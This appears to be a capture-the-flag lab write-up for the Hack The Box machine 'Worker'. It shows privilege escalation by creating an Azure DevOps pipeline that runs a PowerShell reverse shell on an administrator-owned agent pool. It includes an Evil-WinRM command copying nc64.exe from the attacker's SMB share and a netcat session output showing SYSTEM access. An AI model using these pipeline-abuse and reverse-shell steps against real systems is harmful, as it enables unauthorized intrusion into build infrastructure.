InfoSec LAB

Worker_Privilege_Escalation

Created: 3 min read

Pipeline Exploitation

Following the thorough examination of the PartsUnlimited project as the robisl user, the exploitation strategy has been formed involving leveraging the enabled Pipeline permissions in the Setup agent pool. As the agent pool is owned by the administrator user, enabled Pipeline permissions grants the ability to create, modify, and execute pipelines, enabling adversaries to escalate privileges to the administrator user within the context of this agent pool.

This approach distinctively differs from the initial foothold gained from exploiting the SmartHotel360 project, where the focus was on exploiting the “build” process. In this case, by creating an arbitrary pipeline, adversaries can execute builds under the administrator user’s security context due to the ownership, providing a direct path to the highest level of privilege within the target system. The distinct approach underscores the importance of understanding and manipulating pipeline configurations for effective exploitation.

Creating A New Pipeline

Connect

Clicking the New pipeline button leads to the Connect stage where it first prompts for the location of a target repository for builds While there are 4 options to choose from, this is rather irrelevant as the exploitation takes place in the pipeline itself rather the the build I will go with the first option; Azure Repos Git

Select

The Select stage lists the only available repository; PartsUnlimited

Configure

Here in the Configure stage, there are so many options are available

I will go with the absolute minimal Starter pipleline option as all I need is a simple OS command execution

Review

In the Review stage, I am presented with the default azure-pipelines.yml template Azure DevOps uses YAML as the default schema for defining pipelines. While there are so many supported options, I just need one; steps.powershell

I will first change the value of the pool attribute to the Setup agent pool

I will then write a reverse shell command using steps.powershell

*Evil-WinRM* PS C:\tmp> copy \\10.10.16.8\smb\nc64.exe .

Netcat has been transferred to the C:\tmp directory of the target system over SMB using the existing PowerShell session of the robisl user

Clicking the Save and run button prompts another window to write a commit message. Since I cannot commit directly to the master branch, I will create an arbitrary branch; pe

Execution

A new pipeline is being created

A short moment later, A new build (20231124.1) is automatically initiated and queued using the newly created pipeline above

One of the agents picked up the build requests

Hamilton11 is the agent that picked up the build request. Additionally, the build process now hangs at displaying the Privilege Escalation phase, indicating a successfully opened reverse shell session

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 50353
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
ps w:\agents\agent11\_work\8\s> whoami
whoami
nt authority\system
ps w:\agents\agent11\_work\8\s> hostname
hostname
Worker
ps w:\agents\agent11\_work\8\s> ipconfig
ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::248
   ipv6 address. . . . . . . . . . . : dead:beef::1cb0:fbca:343f:d725
   link-local ipv6 address . . . . . : fe80::1cb0:fbca:343f:d725%4
   ipv4 address. . . . . . . . . . . : 10.10.10.203
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks